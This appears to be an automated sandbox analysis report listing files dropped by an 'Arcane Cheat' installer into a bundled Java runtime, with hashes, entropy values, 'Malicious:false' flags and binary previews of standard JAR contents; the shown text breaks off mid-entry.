                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):44516
                                Entropy (8bit):7.905075370162141
                                Encrypted:false
                                SSDEEP:768:2YVL1eqfgKbWnXuZ/QvfBPJr+A6tkZQnWn109KqM9jE4z:2KL1eWgfnXuEfJQAdQnWn10kqg3z
                                MD5:1A33FF1FDD789E655D5E2E99E9E719BD
                                SHA1:AE88E6000EBD7F547E3C047FC81AE1F65016B819
                                SHA-256:A23A9A653A261C640703B42839137F8C4BF7650665E62DBDD7D538171BD72516
                                SHA-512:0451393D805414D6633824F3D18B609F7495324FAB56DF4330E874A8995BD9E0DA567D77DB682D7FD1544CD7E6A3D10745C23DB575035E391B02D6EE4C4362FD
                                Malicious:false
                                Preview:PK........{..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............Z...com/sun/java/accessibility/util/AccessibilityEventMonitor$AccessibilityEventListener.class.Wkp.........5..5..A6`l..C\j.A...eb)..)dm....J+..h...I.&&...L.4.3.$.aH.q.....M...i..m......KNf4.y..~.9g.>.....[p.:....n..p....(........#.D'".ta/.>.D7.|.s.!..f.o......#\w?o...;q..]x....B...~.....t..4>?.#N.1$Aw........;..#j.HJ0%..p...M.5...V[.. ...*......P...).qZ)......a-i...H2.EM..H.2l.H.eX_.>..(..J_..Lj.Z\3G...,...C|.....T..$,.q.OX...[.u..Qg..6..:...iz.q.-.*...:sD@9j.2[..w..I3a.r....cXM..m..}P..J.WU.d`o.nhD.3.=).)..o2..F*...8^k...f)t.........G...e|.....C*K."#.F...,.m.q..I8)....$..x^......e..?..c.D..8..e..7...U..8..dl...rc.s.7d..3...x.....E`.....n/.8.qY......i.~BQ..\.1.K2~.K...s.C.YN...@.Lh...i....PwwW.W...2.z....<%..F..+..xW.e...K.W0...3......J..)S.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-3CKM4.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):279427
                                Entropy (8bit):7.90277234368113
                                Encrypted:false
                                SSDEEP:3072:E/Ieog0SgEOU8pqHbQpr16jWun5bT1aReAaTFMzpx2Xcpll+PrA3YaRBlLi:E/m9eJsppCLJTURe9TFMrQ0fkUK
                                MD5:B04074A9FC78DC1409168E1E2D139647
                                SHA1:54182C904A48364FC572E3A2631DF14823C29CEF
                                SHA-256:BFAD3FB11E7115AAF34719488551BF3205B2FAFFB38681C7F6BDAD19BB7568C2
                                SHA-512:E97CA3D53E867E957BF467688F83C53B2FD6FF1EA001B19F03A23096581DC8ADCEC7C1403D164D063B1A437E4BF6FA98E1543626849D4E17E31156CB012F9599
                                Malicious:false
                                Preview:PK........aZ.H................META-INF/MANIFEST.MF.|I..V..".?xP...p.#..7.G D.N.......~...)....ic.;..[.k.../3...5.5........O....x....6c4>...].u....h.~2.f,n.O|3.}.|<..._}..o........K..Z.=.$m....>...'....O?...G.>&..)no.......Z=...k..~...O.z....c.|(..9.=..|....q.vc....}..i.3.~.}x...~.?.+..._...}.......|..,.,..&`.s..=.....h...%.g.'~..i......p.;A..B..99{....E..k........)......^IW!.._....+..)....d._0...s......v..R.c.*]..0.C..Z}.....j..O%.I.....J.%..).Q..=..0.J.J...A......%T...$..h.#.N%N.e.ne...=DV.......+.....(..f...yn.P..-...f.ON..d=8-....B.^......S.+........$V`..uz....US..h.8.4^Y-;4.M.+i...dw.9.x..k.]...\u..j{<.....r.....y}.E.....X.~%....zF;.<....+-...X.I.I..]..N`.2.G....c~..J.r.o@..My.(.H,...b.e...5'e./...b;D~.%....};....J....1k5CrO..6....n.....>.t..0a.......,.J./;.q.y...w...J.t&s.2.sYk....1...5..._x.....Q..M.J...N.y3{....R..~.F..V......'z...{|..j5..../.;.NCGG\.....!M...Pfe/l..).zL..9.4....?..o.....}.F..M....~.L.q.] ..x.v..d.]G[...q$.E.o...r.(..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-8G35C.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187736
                                Entropy (8bit):7.79606817499301
                                Encrypted:false
                                SSDEEP:3072:9Mxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBgvH6:ONduOJv29amxGiDtonI87aGBgva
                                MD5:13794986CA59819F6AF7BD70022D7F8F
                                SHA1:6C5609CD023EB001DC82F1E989D535CD7AD407EE
                                SHA-256:AF555DD438214DCD68D55EBDDCC0A05BF47DEF0EFD9920E3955D11CC2623628E
                                SHA-512:2E3C4E76FD911EFF5F6983D6D7FBB0F998E5FB0BFE11921A83AC9F19BFB0C28B157354F1AC790094C354845025AB42F5A921FDDF2A780497431F3912D7D3E518
                                Malicious:false
                                Preview:PK........z..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z*. ......".e........MG.|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..|..z_.q.*....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK...........H............0...com/sun/java/accessibility/AccessBridge$10.class.TYO.Q...e`.. ..X.j;...W.Z*j.u.....7ep.!3w._.1&...&....>.....q..m.s.{..l...._...n..0(IN.!...VajH`D.(.v.$.U....v....$g%9.!....N..T.Wq.!.d..e.Vj.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-8USHQ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):68923
                                Entropy (8bit):7.950933538093809
                                Encrypted:false
                                SSDEEP:1536:YNSe2yN5DbD630l1MIeEfqjGWb2LU2j6rnbisZp/u:Ne2yNhDVl1leEP/qn2sZk
                                MD5:4D507E8D7BBF5ECEC8791CBA57B1CE17
                                SHA1:A66C0D4648A06B9078252D090D596C91C591AA50
                                SHA-256:C3993DF765AFF1068A656B28A7A4EDFFE7710AE3B6AA2EA056A6F9C3EDBDC210
                                SHA-512:21B4E729B16947B31657DC5F7F5C75DCDA9F94B4A0ED414E11A6D02951137AC266D605855DDDA7C21BE0200EA07530962D1ECE2FAE009EAE5F2A1A365195C995
                                Malicious:false
                                Preview:PK........b..H................META-INF/......PK..............PK........b..H................META-INF/MANIFEST.MF..;..0...@...uhI.J6-...E.U..-..(I,..m.|Up=..;.B.:.19...Y.Y*8+M.....p,m...F.....?..zRQ..........l....C..]....cO..T.......ds...(.9,...[.~...;.....>....Y.*T6)4. .3..PK.../.?....L...PK........I..H............-...com/sun/nio/zipfs/JarFileSystemProvider.class.U]S.U.~NH.a.@..B.\.!.$.U[.X..J..H..G...$,Mv.....z....9...........Z.d..a.1.y...<..s.y...~....x&c......q..B.`B.......'b.4...'e.1%......i!f../aV.L......B,.XD..KX.......V..^..@....`SD..`[.C._0.'..p.2.EF...SV.3t-.&OW.Yn....i....vx..=..]}O.J.Y.2.m..q.Tmc.Z.....H.arW[[I.7.L...F.k.E&...../.z.J...,U. QD...%....v...".+s.-f.....e..3....."..bvu[..b..Ag.<I7U*.^J..j....~.W\.2....i.j..1C7..:..U.QM.UG.d.c`4.8.Pf..MA.E.;0...1.r..bX..$l>h..%..,h.*..."^=m.90]}.T.}'.&...B;m.-.9.\T....x.p.laD.....#..U.r..P..o...(.a.....`.E.....*1..4-......fT......H.*kN..1....r.Z"7.J+d....B5.'U...e.).!...rt...^.p3..k.8.j.:..k5T....".

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-CGAJL.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3860522
                                Entropy (8bit):7.9670916513081735
                                Encrypted:false
                                SSDEEP:98304:PI1SwP9utPgTIb0bxSxwF1nNZVdEILeH9IIyYNO4Inwz:PI1HYgkoxSxI9fs4UVIwz
                                MD5:AE86774D28F1C8270A9BCBD12A9A1865
                                SHA1:7806C70550F435C2C87D2D15E427E5A9F97774E4
                                SHA-256:0402FBCB23D381DEDE4DF4228F2D100D8693C5B3BAB885AB5EB98BCC0A269786
                                SHA-512:2EA1E0372A087915FFFCCA2DEFC817C37BD038B02824BFEC1DA4E881A4C908A93AEB37DAA38840F75BCEAFD02EC09088FE648B0305DA0407E93407EAC770BE63
                                Malicious:false
                                Preview:PK........s..H................META-INF/......PK..............PK........s..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.q.B........E..%.).N. e.z.......E..9....E..E.%@...\.\.PK...n..N...Z...PK...........H................sun/text/resources/cldr/aa/FormatData_aa.classmPMO.@.}........(.@..xB....!b,1i8..6X..I.5._.'.....(..".9.yy3.f?..?..`?...*6T.5l....aG......=...mqN.......t...:6g.;`^....d.L..\0.|.b...w&.....c.;...8%H...........RqA.......b. ..p./G......B0..K.Sx6...>4\....Zy.!..".R.N....T....=..c~d.7...3(5.<.....a;F....\....a8@..a.@..d^.]YV"k....U...2'#...rX.K...ue...O....bZ.:CB...jZ.]3...2M.s....3}.ct%.GV..PK...]..d.......PK...........H................sun/text/resources/cldr/af/FormatData_af.classuV.x[W.>...a[y......R.+-..K].I.4..(...b.=....a.h...({..B!...{.U......w../...y...?.;w>.u..w..A.......xE.nFxe.nAx...^.p+.k.^..z.7 ...M.oFx..[...v.3..!.....Bx7.{.nGx/....@x?...."..A..!|....G.>..1..#|....B......A.,...>..../"|...._A.*........o"|.....A...........".

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-G569F.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2018860
                                Entropy (8bit):7.9328569913001905
                                Encrypted:false
                                SSDEEP:49152:fBkB7GOrPDSz0fHaIU1KDWtHkLs0amlyYu:fBkoOruSHa/4y/FmA
                                MD5:F3E3E7769994C69DFF6E35EF938443CA
                                SHA1:758F42C0A03121AD980DC98BE82DCAF790679E79
                                SHA-256:CF0268FF39D19876BD42BF59E2CE93BB9AA57E5EE98C212BAE0184BD87F2D35A
                                SHA-512:AB4801E8538B9B84124D2B8C36E64232F16DA686C5FA565C5DE2091C910806A850464F5CCC79C9320DF6F8CB943633FC38FEA63F9E0593A44E3541F15F126951
                                Malicious:false
                                Preview:PK........o..H................META-INF/......PK..............PK........o..H................META-INF/MANIFEST.MFm....0.E.&...:..q.0.....W.g(>Z.v..E4,...{o..>1&y...w.0JsV....<..A..M.bs.. ......F|.Y... .Bt.K9...N%.).s.D.qVC.......c?......'..B,k...&.......i?^0...o...PK..\K:x........PK........i..H............6...jdk/internal/dynalink/beans/AbstractJavaLinker$1.class.S.N.Q..N[.mY.".....T......7.%....A...t..n..m........k51.....2..H.51....o..|..9?~~;....9..J.Y.g...5......M%.4......z....=..v.OF"..7.#....-.e......nU...G^ K.a/.BF.....y.....*C.C.^..!.R.eH.....j....aK.M...3].....=..;'.;]j*..>C....#*.:..Z.(.N...JvEX.I.e..A..."j...C....t.C.q..:..>.J1}...z`..v...[.. .QTa..kXeX..'.1O.c..1...x..W..a.....3.Gl.VG8.C.tE5P...rN.&.v.....F.V.{.say.0^~m.....e....VW.B..x.h..u.i.K..F..j.[;;..Z.z.^f.8.q~.nR.n....Q.2..$.)B.$..|.;.....'.&. .j|@.E....FP#....A-..."...b.n.".H/c..Ho..s.I./.X..p...}..]F....SP.L.u."@..$o.9.b.'.!.;X~6..PK..]./.<...H...PK........i..H............K...jdk/internal

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-INSJS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):32699
                                Entropy (8bit):7.878192531974338
                                Encrypted:false
                                SSDEEP:768:iLy1giOqjU0jNVmOTuDQJD/RpAczsikFfg0y+7aBTS73dyPoXvvKv2PtvHubyKhi:i4giOaU0jNVmOCADZpVsiUf3yua5S7t7
                                MD5:2249EAC4F859C7BC578AFD2F7B771249
                                SHA1:76BA0E08C6B3DF9FB1551F00189323DAC8FC818C
                                SHA-256:A0719CAE8271F918C8613FEB92A7591D0A6E7D04266F62144B2EAB7844D00C75
                                SHA-512:DB5415BC542F4910166163F9BA34BC33AF1D114A73D852B143B2C3E28F59270827006693D6DF460523E26516CAB351D2EE3F944D715AE86CD12D926D09F92454
                                Malicious:false
                                Preview:PK........)..H................META-INF/MANIFEST.MF....X.........ad2....@..%E..M.^.x.. O_dW.5Qi..8.....).aY=.!.Q....g..AM..&0....d.*./#..yM+......g.[.O..$....I?>X9..G......h.]...".y....do.O..2.Y.\^...}+....p2..u.]...V0}....&..a.C...-.....n.....M...M.F..,.....v@...>>|..["J...U7")..#b.oV.a...l.g..e.s..L.D..={.-gLEt.....!/... q....z.J...0.2e...=.....[]{..N...1....Z.....2...I.k...Sy..Qm...{....;.On..!.@..S.IZ..=......Lo.N4..|.j...!.l..G..}.Q....u....ADh.z.w.-..@%.@...!.".R.nHE.P]..J!..E.9Sw.LM7.&...[v..~.P...bp;.....:id.e..o.h..8.C....l...70..].gp..7.<.P.....Zj.....M......-.(@~...M^.....asJ.Y.1.e...(qW..h.c.Iu...-.A..?.5.Ex.S.oc6.).Qkr..+....|..._..H..!7..hs.r.;.z=.....*#.c....6...O+q.I.....|.4.V....Y.T.....4XO..4.>..1.$h..lu..l0..?...w.......o.u....6..)BG'..f......d.v...........<.i..Bj..d..L.....G.r@1.....0..d......'...........*.rK....5x..8.V..9(..Y.`'.k.N....3b.rx.p..c...M_j%..U.z.|Y.1\....d...-I.<g........-.h.*.F...me.F..p.c.o..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-JT4HE.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):8286
                                Entropy (8bit):7.790619326925194
                                Encrypted:false
                                SSDEEP:192:tX5jIgU7WbMCc0XmHTEIWB7EH+mqcEb+wYtvEmkbKdG:tXZU7WbMoWTFWBAH+BCrEmkh
                                MD5:7FA7F97FA1CC0CC8ACC37B9DAE4464AE
                                SHA1:C143646A6DBE2EBDB1FBF69C09793E7F07DBC1F5
                                SHA-256:36820223C5B9A225DC3FF7C1C3930BDB112F1D9AAB2BEE954FF1A1C1828E2C54
                                SHA-512:AD9A0E358BE7A765B4A554E6BBE35BDD61A52BCAC9F21915D84C2A1929780150DFDCF0E43121D0E844082B1BB92873ED848ACF9B38FF3C7D826E5D0F5D32C26C
                                Malicious:false
                                Preview:PK........s..H................META-INF/......PK..............PK........s..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............2...sun/net/spi/nameservice/dns/DNSNameService$1.class.S]O.A.=......./@."e.,(>AH.` )..g.......l../j....LD..F_.M.xw.j.....s.{g.~.........d.n...9.0e.N..i.E.......~A.&.H..7....[<.7|....]f_.....r.)W....*~(B....nM..F.Z!.z.....Ye.(...B.3..2.AM0......pO..x.!.#.0U.I.G..Tu.&..L.......e.![.U..;...-.2.6.<.02P..9...R.......la...*.H....!.."-..H..E].Z.k^.W:p.J^s. .x .c..7j>.A..T...TfG...f....!.6zm.p.F..-.q.K.....1.!.w.C+,2..J....0.!C...0Lw...@..s[.cmp%I-.5..o...1.D].]q..4..-.t1...m.q.3.;\....D.+/..../...N....uv...R.|<<.2M...4...O.yz.F*A...).3{.....7....]..g.i..9&m.[.......K_.}.,;)}F..VR.w........|I.+..B.a...F.-C....h......Y...N...t..D.:.<..d..u`..r..B...PK..K.".u.......PK...........H............2...sun/net/spi/nameservice/dns/DNSNameService$2.class.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-M055Q.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):250826
                                Entropy (8bit):7.951088517189604
                                Encrypted:false
                                SSDEEP:6144:dKtThM4XbBG7v3jUAbE0MEIynrI25ENN/kv1Pv:dKphM4X1G7PjlbE0MxHLbC
                                MD5:2E33D8F1FBEB9239C6FFC0D36DE772D1
                                SHA1:3F881E3B34693A96CD3D9E20D6AEABAE98757359
                                SHA-256:938C497E97E893D0B9325522475AD9FB2C365A4AF832ED180B570C3E4E6FD559
                                SHA-512:DB9A5B0F269BBFC9CB712D8BF170414D649CD72F0DEECCDC3A4D742430E2E29E203F7E462D2DF8F9EC2C82723A8A56FF8FD409CDCBE66547C798B15370B8DB65
                                Malicious:false
                                Preview:PK........mS.F................META-INF/MANIFEST.MF.{.........3.. l@ .G...D.#49A/...........Z.jTUj.{g.\.r..4y...n2.y.........s.UI.4S0=_...*....,..sn..N.p..m..C.....F|{..%Q.....m.v...6.Q.|a.k.?....}...../Q[.6..?.....*..v..P....>..O.:%.E..........o.uS..O..S..Jo....}../.........z.b.....?}_..%pL.y....h.aP.a...1....)..$..IH....v.-..q|..D.z8b..y.<...x..M.K]b=.+.0nSt.co(.-.............C.u..2.W..3...+.....9.d.......L..</..P..z+n..JR;V..K....>...D.....<.....=..+e....>L..`......g.....Os..Ly..T..a.`.}.......Z...R..S...c..z......x.U..)...J.........e..=rr..^K.....hY2.U....e........N.9..r).#!V[..`...B.......CW.}o.q......u7..h0?6.P.14N.-J.\.!u`....H..l...1'J=[.+.-.....X.9.@.......a{C.).Z..P(W.}O...%./..XG=...^..N.enV.F<..oW.|....CJ.....\x..g;v.L.Wf...N.#..*..!.L..:.MD.Vy.z.0.L..72...|.=..eB6(z....#:8D..ig....U....SO.t......0_...>S...}.L.ze....=...k&.[...U^p.$...(........m.z.....~.F..........h......z3<LO.y..4.......w.3.......,W8(..3UF.R.....J)J..q.....Z.d.;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-NN2UH.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187727
                                Entropy (8bit):7.7958934328326075
                                Encrypted:false
                                SSDEEP:3072:aMxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBPlHl:nNduOJv29amxGiDtonI87aGBPlF
                                MD5:82C16750374D5CCA5FDAA9434BAF8143
                                SHA1:9B49F07BFB6F4AE73EB9B2FADCAE46E02E31F023
                                SHA-256:1F0966EBD65544669395E9F490A3D397DCF122D5261566734BB422C68CFE64B8
                                SHA-512:12A32FBE2A0A824EC33BD6D0A22066C0CB74D13EEBC16622FFE420CD48B4EB5878C981384DEBE30285D6231B3224E5CD2380C22D8C18624E52E5C74B62221661
                                Malicious:false
                                Preview:PK........{..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z*. ......".e........MG.|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..|..z_.q.*....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK...........H............0...com/sun/java/accessibility/AccessBridge$10.class.TYO.Q...e`.. ..X.j;...W.Z*j.u.....7ep.!3w._.1&...&....>.....q..m.s.{..l...._...n..0(IN.!...VajH`D.(.v.$.U....v....$g%9.!....N..T.Wq.!.d..e.Vj.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-Q568H.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):18192143
                                Entropy (8bit):5.977388717447885
                                Encrypted:false
                                SSDEEP:49152:ZxJ9lXlkEhZWLyyQSgxv1/FGfnIWkRXe2p0F7tjRozGfVgMS55pU13JbL5xli3d6:ZhLk2bBSgnFGfnhAXLzAeylvi3dGT
                                MD5:042B3675517D6A637B95014523B1FD7D
                                SHA1:82161CAF5F0A4112686E4889A9E207C7BA62A880
                                SHA-256:A570F20F8410F9B1B7E093957BF0AE53CAE4731AFAEA624339AA2A897A635F22
                                SHA-512:7672D0B50A92E854D3BD3724D01084CC10A90678B768E9A627BAF761993E56A0C6C62C19155649FE9A8CEEABF845D86CBBB606554872AE789018A8B66E5A2B35
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H..>.g...g.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.8.2..Created-By: 1.8.0_40-b27 (Oracle Corporation)....PK..........H................com/PK..........H................com/sun/PK........j..H................com/sun/deploy/PK........j..H................com/sun/deploy/uitoolkit/PK........j..H................com/sun/deploy/uitoolkit/impl/PK...........H............!...com/sun/deploy/uitoolkit/impl/fx/PK...........H............$...com/sun/deploy/uitoolkit/impl/fx/ui/PK...........H................com/sun/deploy/uitoolkit/impl/fx/ui/resources/PK...........H............4...com/sun/deploy/uitoolkit/impl/fx/ui/resources/image/PK........}..H................com/sun/glass/PK...........H................com/sun/glass/events/PK...........H................com/sun/glass/ui/PK...........H................com/sun/glass/ui/delegate/PK...........H................com/sun/glass/ui/win/PK..........H................com/su

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-Q8QH7.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1511
                                Entropy (8bit):5.142622776492157
                                Encrypted:false
                                SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\is-UQRP1.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):39771
                                Entropy (8bit):7.92713480980539
                                Encrypted:false
                                SSDEEP:768:ah0EOq/w9b3jpSo40ROLB2CUrQbNVkJBtw6pcZWztpQeA4Uz7NWnZVNB3gX083/z:aJOyw9b3joo4hLB2CUr2yBw6pcMtpS44
                                MD5:A269905BBB9F7D02BAA24A756E7B09D7
                                SHA1:82A0F9C5CBC2B79BDB6CFE80487691E232B26F9C
                                SHA-256:E2787698D746DC25C24D3BE0FA751CEA6267F68B4E972CFC3DF4B4EAC8046245
                                SHA-512:496841CF49E2BF4EB146632F7D1F09EFA8F38AE99B93081AF4297A7D8412B444B9F066358F0C110D33FEA6AE60458355271D8FDCD9854C02EFB2023AF5F661F6
                                Malicious:false
                                Preview:PK.........r.F................META-INF/MANIFEST.MF..I..H....Q..C.f.X..*b......lz..$..dK6..7U....N.5...... .GT.......[.{a...8#(FI......%Ao==...U%%.QOIjL....'.o../..q.q.!....k..)}..4...@J..~\....@..z0._.*....L....=..z.=?)..%... n......HoY.>?........]....Nz..,..c./........6$.@....1.2.X...`:G.j.S..IP.-X...0..8jk...|.....YF.b..u.9...F\.j......y.*Q.'..2.i.S.D...z.j...a..a..L.o..+v. .!.h..8H...d..R.d1a...A.9........zC..Z_.p.`...).t. ...q.1.......\...RS."..11.C.Y..I...J.(.(x.m..N..('[..C.o....H..].<#.%....CZ....[....Y......g..=.2...........I....qm.-....(..BZF.r8=.C(F...I.."...$W....]...9..0b......]...5.M.....`"."k...k....T\....WZQ.>.8..KF..g[Y.c5.s...U..-c....!v..$.rG......1T....bb.s>..R.w....&8.*NX@o+...~,K..2..yI..._f^.l@..|.....U...^...#.P.u!.#..g@/d.<.../..:..V.[.6B.TG....>.D..R\.k....E.E.O4K..Z....f.,..f......hRW...) X......\M.#!)..H..b..f...w..R....w.=.........PC.#...K..|..d.S..Ms.]4q.....c..f......}.NF^.7d...|.*..^\n.l.D..V......

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\jaccess.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):44516
                                Entropy (8bit):7.905075370162141
                                Encrypted:false
                                SSDEEP:768:2YVL1eqfgKbWnXuZ/QvfBPJr+A6tkZQnWn109KqM9jE4z:2KL1eWgfnXuEfJQAdQnWn10kqg3z
                                MD5:1A33FF1FDD789E655D5E2E99E9E719BD
                                SHA1:AE88E6000EBD7F547E3C047FC81AE1F65016B819
                                SHA-256:A23A9A653A261C640703B42839137F8C4BF7650665E62DBDD7D538171BD72516
                                SHA-512:0451393D805414D6633824F3D18B609F7495324FAB56DF4330E874A8995BD9E0DA567D77DB682D7FD1544CD7E6A3D10745C23DB575035E391B02D6EE4C4362FD
                                Malicious:false
                                Preview:PK........{..H................META-INF/......PK..............PK........{..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r.r..PK..<:S1C...D...PK...........H............Z...com/sun/java/accessibility/util/AccessibilityEventMonitor$AccessibilityEventListener.class.Wkp.........5..5..A6`l..C\j.A...eb)..)dm....J+..h...I.&&...L.4.3.$.aH.q.....M...i..m......KNf4.y..~.9g.>.....[p.:....n..p....(........#.D'".ta/.>.D7.|.s.!..f.o......#\w?o...;q..]x....B...~.....t..4>?.#N.1$Aw........;..#j.HJ0%..p...M.5...V[.. ...*......P...).qZ)......a-i...H2.EM..H.2l.H.eX_.>..(..J_..Lj.Z\3G...,...C|.....T..$,.q.OX...[.u..Qg..6..:...iz.q.-.*...:sD@9j.2[..w..I3a.r....cXM..m..}P..J.WU.d`o.nhD.3.=).)..o2..F*...8^k...f)t.........G...e|.....C*K."#.F...,.m.q..I8)....$..x^......e..?..c.D..8..e..7...U..8..dl...rc.s.7d..3...x.....E`.....n/.8.qY......i.~BQ..\.1.K2~.K...s.C.YN...@.Lh...i....PwwW.W...2.z....<%..F..+..xW.e...K.W0...3......J..)S.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\ext\jfxrt.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):18192143
                                Entropy (8bit):5.977388717447885
                                Encrypted:false
